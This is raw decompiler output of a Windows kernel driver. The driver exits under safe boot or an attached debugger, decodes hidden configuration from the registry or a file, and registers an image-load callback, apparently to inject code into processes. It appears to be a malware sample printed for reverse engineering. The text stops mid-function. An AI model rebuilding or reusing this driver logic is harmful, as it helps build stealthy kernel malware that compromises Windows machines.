/* This file has been generated by the Hex-Rays decompiler.
   Copyright (c) 2009 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Data declarations

extern const WCHAR aSystemrootSyst[]; // idb
extern const WCHAR aRtlgetversion[]; // idb
extern const WCHAR aKeareallapcsdi[]; // idb
extern wchar_t aKernel32_dll[13]; // weak
extern char dword_12300[]; // idb
extern char dword_12310[]; // idb
// extern PBOOLEAN KdDebuggerEnabled;
// extern void *InitSafeBootMode; weak
extern int dword_12420; // weak
extern char byte_12428[]; // weak
extern _BYTE byte_1243C[20]; // idb
extern int dword_12450; // weak
extern char a_text[6]; // weak
extern char aPage[5]; // weak
extern char asc_12470[2]; // weak
extern size_t dword_12478; // idb
extern int dword_1247C; // weak
extern int dword_12480; // weak
extern int dword_12484; // weak
extern int dword_12488; // weak
extern _UNKNOWN unk_1248C; // weak
extern _UNKNOWN unk_12D30; // weak
extern _UNKNOWN unk_13E80; // weak
extern _UNKNOWN unk_13E84; // weak
extern char byte_13E88; // weak
extern char byte_13E89; // weak
extern char byte_13E8A; // weak
extern char byte_13E8B; // weak
extern char byte_13E98; // weak
extern int dword_13E99; // weak
extern const WCHAR word_13E9D; // idb
extern const WCHAR word_13F65; // idb
extern const WCHAR word_13F79; // idb
extern int dword_14041; // weak
extern int dword_14045; // weak
extern const WCHAR SourceString; // idb
extern int dword_14118; // weak
extern int dword_1411C; // weak
extern int dword_14120; // weak
extern char byte_14124; // weak
extern int dword_14128; // weak
extern int dword_1412C; // weak
extern int dword_14130; // weak
extern int dword_14134; // weak
extern int dword_14138; // weak
extern RTL_GENERIC_TABLE Table; // idb
extern int dword_14164; // weak
extern char byte_14168; // weak
extern int dword_1416C; // weak
extern int dword_14170; // weak
extern char byte_14174; // weak
extern int dword_14178; // weak
extern int dword_1417C; // weak
extern int dword_14180; // weak
extern int dword_14184; // weak

//-------------------------------------------------------------------------
// Function declarations

#define __thiscall __cdecl // Test compile in C mode

char __cdecl sub_10300();
void __stdcall DriverReinitializationRoutine(PDRIVER_OBJECT DriverObject, int a2, unsigned int a3);
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath);
int __stdcall sub_104C8(int a1);
int __cdecl sub_10580();
// int __usercall sub_105A8<eax>(int a1<esi>);
// int __userpurge sub_105DA<eax>(int a1<ebx>, SIZE_T a2<edi>, int a3<esi>, const void *a4);
// int __usercall sub_1061E<eax>(LSA_UNICODE_STRING *a1<ecx>, int a2<edi>, int a3<esi>);
ULONG __thiscall sub_10672(LSA_UNICODE_STRING *this, ULONG a2, int a3);
// void __userpurge sub_107A8(int a1<ebx>, PVOID *a2);
signed int __fastcall sub_107DC(int a1, int a2);
int *__cdecl sub_10822();
bool __stdcall sub_1089A(int a1);
int __cdecl sub_108D2();
// int __usercall sub_10922<eax>(int a1<edi>, int *a2<esi>);
// int __usercall sub_1097A<eax>(int a1<ecx>, int a2<esi>);
// int __usercall sub_109B6<eax>(int a1<esi>);
int __stdcall sub_109E8(int, PIRP Irp); // idb
int __stdcall sub_10A04(int, PIRP Irp); // idb
// unsigned int __usercall sub_10A7A<eax>(int a1<eax>);
// void __usercall sub_10B28(int a1<eax>);
// int __usercall sub_10B52<eax>(int a1<ecx>, int a2<edi>, int a3<esi>);
int __stdcall sub_10B76(int, HANDLE Handle, int); // idb
KIRQL __stdcall NotifyRoutine(int a1, HANDLE Handle, int a3);
// int __userpurge sub_10D4A<eax>(int result<eax>, int a2);
RTL_GENERIC_TABLE *__cdecl sub_10D6C();
// PVOID __usercall sub_10DAE<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>);
// signed int __usercall sub_10DEC<eax>(int a1<eax>, RTL_GENERIC_TABLE *a2<edi>);
// signed int __userpurge sub_10E46<eax>(RTL_GENERIC_TABLE *a1<eax>, int *a2);
bool __stdcall CompareRoutine(int a1, int a2, int a3);
PVOID __stdcall AllocateRoutine(int a1, SIZE_T NumberOfBytes);
void __stdcall FreeRoutine(int a1, PVOID P);
// int __usercall sub_10F10<eax>(int a1<ebx>, int a2<esi>);
// int __userpurge sub_10F3A<eax>(int a1<eax>, int a2<ebx>, int a3);
// signed int __userpurge sub_10FC8<eax>(int a1<eax>, int a2, int a3);
// PVOID __userpurge sub_11146<eax>(int a1<edi>, int a2, int a3);
// void __userpurge sub_111A2(int a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5);
void __fastcall sub_11270(int a1, int a2, int a3, int a4, int a5);
LONG_PTR __stdcall sub_112A6(int a1, int a2, int a3, int a4, int a5);
PVOID __stdcall sub_112FC(int a1);
PVOID __stdcall sub_1131C(int a1);
// signed int __userpurge sub_11350<eax>(const void *a1<eax>, int a2<ebx>, int a3);
signed int __thiscall sub_11498(int this, int a2, const void *a3);
__int32 __stdcall sub_114CA(int a1, int a2);
// char __usercall sub_11528<al>(WCHAR *a1<eax>, int a2<ecx>);
// PVOID __usercall sub_115AC<eax>(ULONG a1<esi>);
// int __usercall sub_115E4<eax>(HANDLE *a1<edi>);
signed int __stdcall sub_11662(unsigned int a1, int a2);
char __fastcall sub_1172E(int a1, int a2);
// char __usercall sub_11788<al>(int a1<edi>);
// int __userpurge sub_117CA<eax>(int a1<eax>, int a2<ebx>, unsigned int a3);
// const char *__usercall sub_1183C<eax>(const char *result<eax>, int a2<ecx>);
int __stdcall sub_11884(int a1, const char *a2, unsigned int a3, int a4, int a5);
int *__cdecl sub_11994();
int __stdcall sub_11A48(int a1);
char __stdcall sub_11AC2(int a1, unsigned int a2);
// NTSTATUS __userpurge sub_11ADE<eax>(LSA_UNICODE_STRING *a1<eax>, PUNICODE_STRING ValueName, int a3);
int __stdcall sub_11B52(int, PUNICODE_STRING ValueName, int); // idb
// int __usercall sub_11C42<eax>(char a1<al>, int a2<ecx>, unsigned int a3<esi>);
int __stdcall sub_11CBE(int, int, HANDLE Handle); // idb
// int __userpurge sub_11D3C<eax>(int a1<esi>, int a2, int a3);
int __stdcall sub_11D7C(const char *a1);
int __cdecl sub_11E4C();
int __stdcall sub_11E6E(HANDLE Handle, PVOID ProcessInformation); // idb
// int __userpurge sub_11F02<eax>(int a1<ebx>, int a2<edi>, int a3);
// LONG_PTR __usercall sub_11F3A<eax>(PVOID Object<ecx>, LONG_PTR result<eax>);
signed int __cdecl sub_11F4C(int a1, int a2);
int __cdecl sub_12017(int a1, unsigned int a2);
int __cdecl sub_1202D(int a1, unsigned int a2, int a3, int a4);
int __cdecl sub_12079(int a1);
int __fastcall sub_120AA(int a1, int a2, int a3, int a4, unsigned __int16 a5);
int __cdecl sub_120E9(int a1, unsigned int a2);
int __cdecl sub_12145(int a1, int a2);
// NTSTATUS __stdcall ZwQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
// void *__cdecl memcpy(void *, const void *, size_t);
// void *__cdecl memset(void *, int, size_t);
int nullsub_1(); // weak
int nullsub_2(); // weak
int sub_12322(); // weak
int nullsub_3(); // weak
// KIRQL __fastcall KfAcquireSpinLock(PKSPIN_LOCK SpinLock);
// KIRQL __stdcall KeGetCurrentIrql();
// void __fastcall KfReleaseSpinLock(PKSPIN_LOCK SpinLock, KIRQL NewIrql);
// NTSTATUS __stdcall ZwReadFile(HANDLE FileHandle, HANDLE Event, PIO_APC_ROUTINE ApcRoutine, PVOID ApcContext, PIO_STATUS_BLOCK IoStatusBlock, PVOID Buffer, ULONG Length, PLARGE_INTEGER ByteOffset, PULONG Key);
// NTSTATUS __stdcall ZwClose(HANDLE Handle);
// NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions);
// NTSTATUS __stdcall ZwQueryInformationFile(HANDLE FileHandle, PIO_STATUS_BLOCK IoStatusBlock, PVOID FileInformation, ULONG Length, FILE_INFORMATION_CLASS FileInformationClass);
// PVOID __stdcall MmGetSystemRoutineAddress(PUNICODE_STRING SystemRoutineName);
// BOOLEAN __stdcall PsGetVersion(PULONG MajorVersion, PULONG MinorVersion, PULONG BuildNumber, PUNICODE_STRING CSDVersion);
// NTSTATUS __stdcall PsSetLoadImageNotifyRoutine(PLOAD_IMAGE_NOTIFY_ROUTINE NotifyRoutine);
// PVOID __stdcall ExAllocatePool(POOL_TYPE PoolType, SIZE_T NumberOfBytes);
// NTSTATUS __stdcall IoCreateDevice(PDRIVER_OBJECT DriverObject, ULONG DeviceExtensionSize, PUNICODE_STRING DeviceName, ULONG DeviceType, ULONG DeviceCharacteristics, BOOLEAN Exclusive, PDEVICE_OBJECT *DeviceObject);
// BOOLEAN __stdcall RtlDeleteElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer);
// PKTHREAD __stdcall KeGetCurrentThread();
// PVOID __stdcall RtlLookupElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer);
// void __stdcall RtlInitializeGenericTable(PRTL_GENERIC_TABLE Table, PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, PRTL_GENERIC_FREE_ROUTINE FreeRoutine, PVOID TableContext);
// PVOID __stdcall RtlInsertElementGenericTable(PRTL_GENERIC_TABLE Table, PVOID Buffer, CLONG BufferSize, PBOOLEAN NewElement);
// WCHAR __stdcall RtlUpcaseUnicodeChar(WCHAR SourceCharacter);
// NTSTATUS __stdcall ZwAllocateVirtualMemory(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG ZeroBits, PULONG AllocationSize, ULONG AllocationType, ULONG Protect);
// void __stdcall RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString);
// void __stdcall IoRegisterDriverReinitialization(PDRIVER_OBJECT DriverObject, PDRIVER_REINITIALIZE DriverReinitializationRoutine, PVOID Context);
// void __fastcall IofCompleteRequest(PIRP Irp, CCHAR PriorityBoost);
// void __stdcall ExFreePoolWithTag(PVOID P, ULONG Tag);
// NTSTATUS __stdcall ZwQueryValueKey(HANDLE KeyHandle, PUNICODE_STRING ValueName, KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, PVOID KeyValueInformation, ULONG Length, PULONG ResultLength);
// NTSTATUS __stdcall ZwOpenKey(PHANDLE KeyHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
// int __stdcall KeUnstackDetachProcess(_DWORD); weak
// int __stdcall KeStackAttachProcess(_DWORD, _DWORD); weak
// int __cdecl stricmp(const char *, const char *);
// NTSTATUS __stdcall ZwQueryInformationProcess(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
// int __stdcall ObOpenObjectByPointer(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); weak
// int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD); weak
// LONG_PTR __fastcall ObfDereferenceObject(PVOID Object);
// signed int __usercall sub_1281C<eax>(int a1<esi>);
signed int __cdecl sub_128A9(int a1);
// bool __usercall sub_12B92<eax>(int a1<eax>, int a2);
int __thiscall sub_12BCC(void *this);
// signed int __usercall sub_13179<eax>(int a1<eax>, unsigned int a2);
// int __usercall sub_131F5<eax>(int a1<esi>, int a2, int a3, int a4);
// int __usercall sub_13323<eax>(unsigned int *a1<eax>, int a2<ecx>, int a3<ebx>, int a4, int a5, int a6);
int __thiscall sub_13447(void *this);
signed int __cdecl sub_1347D(int a1, int a2);
int __cdecl sub_13548(int a1, unsigned int a2);
int __cdecl sub_1355E(int a1, unsigned int a2, int a3, int a4);
int __cdecl sub_135AA(int a1);
int __fastcall sub_136C7(int a1, int a2, int a3, int a4, unsigned __int16 a5);
// int __usercall sub_137AD<eax>(unsigned int a1<eax>, int a2<ecx>, int a3, int a4, int a5);
// signed int __usercall sub_13822<eax>(int a1<eax>, int a2<edx>, int a3<ecx>, unsigned int a4);
// signed int __usercall sub_138DF<eax>(int a1<eax>, int a2, int a3, unsigned int a4, int (__cdecl *a5)(_DWORD, _DWORD, _DWORD));


//----- (00010300) --------------------------------------------------------
char __cdecl sub_10300()
{
  LSA_UNICODE_STRING DestinationString; // [sp+8h] [bp-18h]@1
  char v2; // [sp+10h] [bp-10h]@1
  HANDLE Handle; // [sp+14h] [bp-Ch]@2
  int v4; // [sp+18h] [bp-8h]@1
  char v5; // [sp+1Fh] [bp-1h]@1

  RtlInitUnicodeString(&DestinationString, L"\\SystemRoot\\System32\\hal.dll");
  v4 = 0;
  sub_1061E(&DestinationString, (int)&v4, (int)&v2);
  v5 = v4 == 0;
  if ( v2 )
  {
    v2 = 0;
    ZwClose(Handle);
  }
  return v5;
}

//----- (0001034C) --------------------------------------------------------
void __stdcall DriverReinitializationRoutine(PDRIVER_OBJECT DriverObject, int a2, unsigned int a3)
{
  if ( !KeGetCurrentIrql() )
  {
    if ( a3 <= 0x65 )
    {
      if ( !sub_10580() )
      {
        if ( sub_10300() )
          sub_108D2();
        else
          IoRegisterDriverReinitialization(DriverObject, DriverReinitializationRoutine, 0);
      }
    }
  }
}

//----- (000103AA) --------------------------------------------------------
NTSTATUS __stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
  signed int v2; // eax@2
  signed int v3; // eax@14
  LSA_UNICODE_STRING DestinationString; // [sp+Ch] [bp-28h]@19
  PDEVICE_OBJECT DeviceObject; // [sp+14h] [bp-20h]@19
  unsigned int i; // [sp+18h] [bp-1Ch]@3
  CPPEH_RECORD ms_exc; // [sp+1Ch] [bp-18h]@1

  ms_exc.disabled = 0;
  dword_14120 = 128;
  dword_14118 = (int)ExAllocatePool(0, 0x200u);
  if ( dword_14118 )
  {
    byte_14124 = 1;
    for ( i = (unsigned int)&unk_13E80; i < (unsigned int)&unk_13E84; i += 4 )
    {
      if ( *(_DWORD *)i )
        (*(void (**)(void))i)();
    }
    v2 = 0;
  }
  else
  {
    v2 = -1073741823;
  }
  if ( !v2 )
  {
    if ( byte_13E98 )
    {
      sub_11C42(0, (int)&dword_13E99, 0x278u);
      byte_13E98 = 0;
    }
    if ( dword_13E99 & 1 && InitSafeBootMode || dword_13E99 & 2 && (_BYTE)KdDebuggerEnabled )
      v3 = -1073741823;
    else
      v3 = 0;
    if ( !v3 )
    {
      RtlInitUnicodeString(&DestinationString, &SourceString);
      if ( !IoCreateDevice(DriverObject, 0, &DestinationString, 0x22u, 0x100u, 0, &DeviceObject) )
      {
        DriverObject->MajorFunction[0] = (PDRIVER_DISPATCH)sub_109E8;
        DriverObject->MajorFunction[2] = (PDRIVER_DISPATCH)sub_109E8;
        DriverObject->MajorFunction[14] = (PDRIVER_DISPATCH)sub_10A04;
        IoRegisterDriverReinitialization(DriverObject, (PDRIVER_REINITIALIZE)DriverReinitializationRoutine, 0);
      }
    }
  }
  return 0;
}
// 123B0: using guessed type void *InitSafeBootMode;
// 13E98: using guessed type char byte_13E98;
// 13E99: using guessed type int dword_13E99;
// 14118: using guessed type int dword_14118;
// 14120: using guessed type int dword_14120;
// 14124: using guessed type char byte_14124;

//----- (000104C8) --------------------------------------------------------
int __stdcall sub_104C8(int a1)
{
  int v1; // edi@5
  int result; // eax@7
  int (*v3)(void); // edi@11
  int v4; // [sp+8h] [bp-120h]@6
  __int16 v5; // [sp+11Ch] [bp-Ch]@9
  int v6; // [sp+124h] [bp-4h]@3

  *(_BYTE *)a1 = 1;
  if ( !KeGetCurrentIrql() )
  {
    sub_105A8((int)&v6);
    if ( sub_1089A(0) || sub_1089A(1) )
      return 0;
    v1 = v6;
    if ( sub_1089A(2) )
    {
      memset(&v4, 255, 0x11Cu);
      v4 = 284;
      if ( !*(_DWORD *)v1 )
        return -1073741823;
      result = (*(int (__stdcall **)(int *))v1)(&v4);
      if ( result )
        return result;
      if ( !v5 )
        return *(_DWORD *)(v1 + 4) != 0 ? 0xC0000001 : 0;
    }
    v3 = *(int (**)(void))(v1 + 4);
    if ( v3 )
    {
      if ( (unsigned __int8)v3() )
        *(_BYTE *)a1 = 0;
      return 0;
    }
    return -1073741823;
  }
  *(_BYTE *)a1 = 0;
  return 0;
}

//----- (00010580) --------------------------------------------------------
int __cdecl sub_10580()
{
  int result; // eax@1
  char v1; // [sp+1h] [bp-1h]@1

  v1 = 0;
  result = sub_104C8((int)&v1);
  if ( !result )
    result = (v1 != 0 ? 0x3FFFFFFF : 0) - 1073741823;
  return result;
}

//----- (000105A8) --------------------------------------------------------
int __usercall sub_105A8<eax>(int a1<esi>)
{
  int v1; // ecx@2

  *(_DWORD *)a1 = 0;
  if ( !(dword_14130 & 1) )
  {
    dword_14130 |= 1u;
    sub_10822();
    sub_107DC(v1, (int)nullsub_1);
  }
  byte_13E88 = 0;
  *(_DWORD *)a1 = &dword_14128;
  return a1;
}
// 1231E: using guessed type int nullsub_1();
// 13E88: using guessed type char byte_13E88;
// 14128: using guessed type int dword_14128;
// 14130: using guessed type int dword_14130;

//----- (000105DA) --------------------------------------------------------
int __userpurge sub_105DA<eax>(int a1<ebx>, SIZE_T a2<edi>, int a3<esi>, const void *a4)
{
  PVOID v4; // eax@1
  char v5; // zf@1

  v4 = ExAllocatePool(0, a2);
  v5 = *(_DWORD *)a1 == 0;
  *(_DWORD *)a3 = v4;
  *(_DWORD *)(a3 + 4) = a2;
  *(_DWORD *)(a3 + 8) = v4;
  *(_DWORD *)(a3 + 12) = a2;
  if ( v5 )
  {
    if ( *(_DWORD *)a3 )
    {
      if ( a4 )
        memcpy(*(void **)a3, a4, a2);
    }
    else
    {
      *(_DWORD *)a1 = -1073741823;
    }
  }
  return a3;
}

//----- (0001061E) --------------------------------------------------------
int __usercall sub_1061E<eax>(LSA_UNICODE_STRING *a1<ecx>, int a2<edi>, int a3<esi>)
{
  char v3; // zf@1
  NTSTATUS v4; // eax@2
  OBJECT_ATTRIBUTES ObjectAttributes; // [sp+8h] [bp-20h]@2
  struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+20h] [bp-8h]@2

  v3 = *(_DWORD *)a2 == 0;
  *(_BYTE *)a3 = 0;
  *(_DWORD *)(a3 + 4) = 0;
  if ( v3 )
  {
    ObjectAttributes.ObjectName = a1;
    ObjectAttributes.Length = 24;
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.Attributes = 576;
    ObjectAttributes.SecurityDescriptor = 0;
    ObjectAttributes.SecurityQualityOfService = 0;
    v4 = ZwOpenFile((PHANDLE)(a3 + 4), 0x80100000u, &ObjectAttributes, &IoStatusBlock, 1u, 0x60u);
    *(_DWORD *)a2 = v4;
    *(_BYTE *)a3 = v4 == 0;
  }
  return a3;
}

//----- (00010672) --------------------------------------------------------
ULONG __thiscall sub_10672(LSA_UNICODE_STRING *this, ULONG a2, int a3)
{
  char v3; // bl@1
  ULONG result; // eax@4
  HANDLE v5; // ecx@6
  ULONG v6; // edi@6
  ULONG v7; // esi@6
  NTSTATUS v8; // eax@7
  int v9; // eax@17
  int v10; // eax@18
  void **v11; // eax@21
  void *v12; // eax@22
  char FileInformation; // [sp+10h] [bp-28h]@7
  ULONG v14; // [sp+18h] [bp-20h]@7
  void *v15; // [sp+1Ch] [bp-1Ch]@7
  ULONG Length; // [sp+28h] [bp-10h]@1
  HANDLE Handle; // [sp+2Ch] [bp-Ch]@3
  struct _IO_STATUS_BLOCK IoStatusBlock; // [sp+30h] [bp-8h]@1

  v3 = 0;
  IoStatusBlock.Information = 0;
  sub_1061E(this, (int)&IoStatusBlock.Information, (int)&Length);
  if ( IoStatusBlock.Information )
    goto LABEL_2;
  if ( (_BYTE)Length )
  {
    v8 = ZwQueryInformationFile(Handle, &IoStatusBlock, &FileInformation, 0x18u, FileStandardInformation);
    v6 = v14;
    v5 = v15;
    v7 = v8;
  }
  else
  {
    v5 = Handle;
    v6 = Length;
    v7 = -1073741823;
  }
  IoStatusBlock.Information = v7;
  if ( v7 )
    goto LABEL_9;
  if ( v5 || v6 > a2 )
    goto LABEL_31;
  v9 = (int)ExAllocatePool(0, 0x10u);
  if ( v9 )
    v10 = sub_105DA((int)&IoStatusBlock.Information, v6, v9, 0);
  else
    v10 = 0;
  sub_107A8(a3, (PVOID *)v10);
  v3 = 0;
  if ( IoStatusBlock.Information )
  {
LABEL_2:
    if ( (_BYTE)Length != v3 )
    {
      LOBYTE(Length) = v3;
      ZwClose(Handle);
    }
    return IoStatusBlock.Information;
  }
  v11 = *(void ***)(a3 + 4);
  if ( !v11 )
    goto LABEL_31;
  v12 = *v11;
  if ( !(_BYTE)Length )
    return -1073741823;
  v7 = ZwReadFile(Handle, 0, 0, 0, &IoStatusBlock, v12, v6, 0, 0);
  if ( v7 )
  {
LABEL_9:
    if ( (_BYTE)Length != v3 )
    {
      LOBYTE(Length) = v3;
      ZwClose(Handle);
    }
    return v7;
  }
  if ( IoStatusBlock.Information != v6 )
  {
LABEL_31:
    if ( (_BYTE)Length != v3 )
    {
      LOBYTE(Length) = v3;
      ZwClose(Handle);
    }
    result = -1073741823;
  }
  else
  {
    if ( (_BYTE)Length )
    {
      LOBYTE(Length) = 0;
      ZwClose(Handle);
    }
    result = 0;
  }
  return result;
}

//----- (000107A8) --------------------------------------------------------
void __userpurge sub_107A8(int a1<ebx>, PVOID *a2)
{
  PVOID *v2; // esi@1

  v2 = *(PVOID **)(a1 + 4);
  if ( a2 != v2 )
  {
    if ( v2 )
    {
      if ( *v2 )
        ExFreePoolWithTag(*v2, 0);
      ExFreePoolWithTag(v2, 0);
    }
    *(_DWORD *)(a1 + 4) = a2;
  }
}

//----- (000107DC) --------------------------------------------------------
signed int __fastcall sub_107DC(int a1, int a2)
{
  signed int result; // eax@5

  if ( !byte_14124 )
    goto LABEL_9;
  if ( !dword_14118 )
    goto LABEL_9;
  if ( dword_14120 <= dword_1411C )
    goto LABEL_9;
  _ECX = &dword_1411C;
  _EAX = 1;
  __asm { lock xadd [ecx], eax }
  if ( dword_14120 > _EAX )
  {
    *(_DWORD *)(dword_14118 + 4 * _EAX) = a2;
    result = 0;
  }
  else
  {
LABEL_9:
    result = 1;
  }
  return result;
}
// 14118: using guessed type int dword_14118;
// 1411C: using guessed type int dword_1411C;
// 14120: using guessed type int dword_14120;
// 14124: using guessed type char byte_14124;

//----- (00010822) --------------------------------------------------------
int *__cdecl sub_10822()
{
  LSA_UNICODE_STRING DestinationString; // [sp+Ch] [bp-20h]@2
  CPPEH_RECORD ms_exc; // [sp+14h] [bp-18h]@2

  dword_14128 = 0;
  dword_1412C = 0;
  if ( !sub_1089A(0) )
  {
    ms_exc.disabled = 0;
    RtlInitUnicodeString(&DestinationString, L"RtlGetVersion");
    dword_14128 = (int)MmGetSystemRoutineAddress(&DestinationString);
    RtlInitUnicodeString(&DestinationString, L"KeAreAllApcsDisabled");
    dword_1412C = (int)MmGetSystemRoutineAddress(&DestinationString);
    ms_exc.disabled = -1;
  }
  return &dword_14128;
}
// 14128: using guessed type int dword_14128;
// 1412C: using guessed type int dword_1412C;

//----- (0001089A) --------------------------------------------------------
bool __stdcall sub_1089A(int a1)
{
  ULONG MinorVersion; // [sp+0h] [bp-8h]@1
  ULONG MajorVersion; // [sp+4h] [bp-4h]@1

  MajorVersion = 0;
  MinorVersion = 0;
  PsGetVersion(&MajorVersion, &MinorVersion, 0, 0);
  return MajorVersion == 5 && a1 == MinorVersion;
}

//----- (000108D2) --------------------------------------------------------
int __cdecl sub_108D2()
{
  int result; // eax@1
  int v1; // ecx@1
  char v2; // [sp+8h] [bp-8h]@1
  int v3; // [sp+Ch] [bp-4h]@1

  v3 = 0;
  sub_10922((int)&v2, &v3);
  result = v3;
  if ( !v3 )
  {
    sub_1097A(v1, (int)&v3);
    result = sub_10A7A(v3);
    if ( !result )
    {
      sub_109B6((int)&v2);
      sub_105A8((int)&v2);
      result = PsSetLoadImageNotifyRoutine((PLOAD_IMAGE_NOTIFY_ROUTINE)NotifyRoutine);
    }
  }
  return result;
}

//----- (00010922) --------------------------------------------------------
int __usercall sub_10922<eax>(int a1<edi>, int *a2<esi>)
{
  int v2; // eax@2
  int v3; // ecx@4

  *(_DWORD *)a1 = 0;
  if ( !(dword_14184 & 1) )
  {
    v2 = *a2;
    dword_14184 |= 1u;
    dword_14138 = v2;
  }
  if ( !(dword_14184 & 2) )
  {
    dword_14184 |= 2u;
    sub_11994();
    sub_107DC(v3, (int)nullsub_3);
  }
  if ( dword_14138 )
    *a2 = dword_14138;
  else
    *(_DWORD *)a1 = &dword_14134;
  byte_13E89 = 0;
  return a1;
}
// 1232C: using guessed type int nullsub_3();
// 13E89: using guessed type char byte_13E89;
// 14134: using guessed type int dword_14134;
// 14138: using guessed type int dword_14138;
// 14184: using guessed type int dword_14184;

//----- (0001097A) --------------------------------------------------------
int __usercall sub_1097A<eax>(int a1<ecx>, int a2<esi>)
{
  *(_DWORD *)a2 = 0;
  if ( !(dword_14180 & 1) )
  {
    dword_14180 |= 1u;
    dword_14178 = 0;
    byte_14174 = 1;
    sub_107DC(a1, (int)sub_12322);
  }
  byte_13E8A = 0;
  *(_DWORD *)a2 = &byte_14174;
  return a2;
}
// 12322: using guessed type int sub_12322();
// 13E8A: using guessed type char byte_13E8A;
// 14174: using guessed type char byte_14174;
// 14178: using guessed type int dword_14178;
// 14180: using guessed type int dword_14180;

//----- (000109B6) --------------------------------------------------------
int __usercall sub_109B6<eax>(int a1<esi>)
{
  int v1; // ecx@2

  *(_DWORD *)a1 = 0;
  if ( !(dword_1417C & 1) )
  {
    dword_1417C |= 1u;
    sub_10D6C();
    sub_107DC(v1, (int)nullsub_2);
  }
  byte_13E8B = 0;
  *(_DWORD *)a1 = &Table;
  return a1;
}
// 12320: using guessed type int nullsub_2();
// 13E8B: using guessed type char byte_13E8B;
// 1417C: using guessed type int dword_1417C;

//----- (000109E8) --------------------------------------------------------
int __stdcall sub_109E8(int a1, PIRP Irp)
{
  Irp->IoStatus.Information = 0;
  Irp->IoStatus.Status = 0;
  IofCompleteRequest(Irp, 0);
  return 0;
}

//----- (00010A04) --------------------------------------------------------
signed int __stdcall sub_10A04(int a1, PIRP Irp)
{
  int v2; // eax@2
  signed int result; // eax@4
  NTSTATUS v4; // edi@4

  if ( *((_DWORD *)Irp->Tail.Overlay.CurrentStackLocation + 3) == 2242560 )
    v2 = sub_11A48((int)Irp);
  else
    v2 = -1073741822;
  v4 = v2;
  result = 259;
  if ( v4 != 259 )
  {
    if ( v4 )
      Irp->IoStatus.Information = 0;
    Irp->IoStatus.Status = v4;
    IofCompleteRequest(Irp, 0);
    result = v4;
  }
  return result;
}

//----- (00010A7A) --------------------------------------------------------
unsigned int __usercall sub_10A7A<eax>(int a1<eax>)
{
  int v1; // edi@1
  int v2; // eax@3
  unsigned int v3; // esi@3
  int v4; // ecx@3
  unsigned int result; // eax@4
  int v6; // edi@6
  ULONG v7; // [sp+Ch] [bp-1Ch]@1
  LSA_UNICODE_STRING ValueName; // [sp+10h] [bp-18h]@1
  LSA_UNICODE_STRING DestinationString; // [sp+18h] [bp-10h]@1
  char v10; // [sp+20h] [bp-8h]@2

  v1 = a1;
  RtlInitUnicodeString(&DestinationString, &word_13E9D);
  RtlInitUnicodeString(&ValueName, &word_13F65);
  v7 = sub_11ADE(&DestinationString, &ValueName, v1);
  if ( v7
    && (RtlInitUnicodeString((PUNICODE_STRING)&v10, &word_13F79),
        (v7 = sub_10672((LSA_UNICODE_STRING *)&v10, dword_14041, v1)) != 0)
    || (v2 = *(_DWORD *)(v1 + 4), v3 = *(_DWORD *)(v2 + 4), sub_11C42(dword_14045, *(_DWORD *)v2, v3), sub_11AC2(v4, v3)) )
    return -1073741823;
  result = v7;
  if ( !v7 )
  {
    v6 = *(_DWORD *)(v1 + 4);
    if ( !v6 )
      return -1073741823;
    result = (v7 < *(_DWORD *)(v6 + 4) ? 0x3FFFFFFF : 0) - 1073741823;
  }
  return result;
}
// 14041: using guessed type int dword_14041;
// 14045: using guessed type int dword_14045;

//----- (00010B28) --------------------------------------------------------
void __usercall sub_10B28(int a1<eax>)
{
  PVOID *v1; // edi@2

  if ( *(_BYTE *)a1 )
  {
    v1 = *(PVOID **)(a1 + 4);
    *(_BYTE *)a1 = 0;
    if ( v1 )
    {
      if ( *v1 )
        ExFreePoolWithTag(*v1, 0);
      ExFreePoolWithTag(v1, 0);
    }
  }
}

//----- (00010B52) --------------------------------------------------------
int __usercall sub_10B52<eax>(int a1<ecx>, int a2<edi>, int a3<esi>)
{
  int v4; // eax@1
  int v5; // [sp+0h] [bp-4h]@1

  v5 = a1;
  sub_10D4A(a3, (int)&v5);
  *(_DWORD *)a2 = *(_DWORD *)(a3 + 8) + *(_DWORD *)a3;
  v4 = v5;
  *(_DWORD *)(a2 + 4) = v5;
  *(_DWORD *)(a3 + 8) += v4;
  return a3;
}

//----- (00010B76) --------------------------------------------------------
int __stdcall sub_10B76(int a1, HANDLE Handle, int a3)
{
  int result; // eax@2
  int v4; // ecx@8
  int v5; // esi@8
  int v6; // ecx@8
  int v7; // eax@8
  int v8; // ebx@11
  int v9; // ecx@11
  int v10; // eax@13
  int i; // [sp+10h] [bp-48h]@4
  unsigned int v12; // [sp+14h] [bp-44h]@8
  RTL_GENERIC_TABLE *v13; // [sp+18h] [bp-40h]@8
  int v14; // [sp+1Ch] [bp-3Ch]@8
  int v15; // [sp+20h] [bp-38h]@8
  int v16; // [sp+24h] [bp-34h]@8
  int v17; // [sp+28h] [bp-30h]@8
  int v18; // [sp+2Ch] [bp-2Ch]@10
  int v19; // [sp+30h] [bp-28h]@10
